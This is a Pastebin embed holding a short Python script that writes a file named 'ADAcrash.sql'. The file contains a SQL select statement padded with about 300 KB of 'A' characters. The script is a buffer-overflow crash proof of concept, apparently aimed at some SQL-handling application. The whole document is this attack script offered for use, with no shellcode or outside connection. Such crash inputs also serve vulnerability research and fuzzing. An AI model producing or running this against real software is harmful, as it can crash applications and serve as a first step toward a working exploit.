document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. #!/usr/bin/python
  2.  
  3. sql="select * from clients where "
  4. buf="A"*(1024*300)
  5. crash=sql+buf
  6.  
  7. f=open("ADAcrash.sql",\'w\')
  8. f.write(crash)
  9. f.close()
');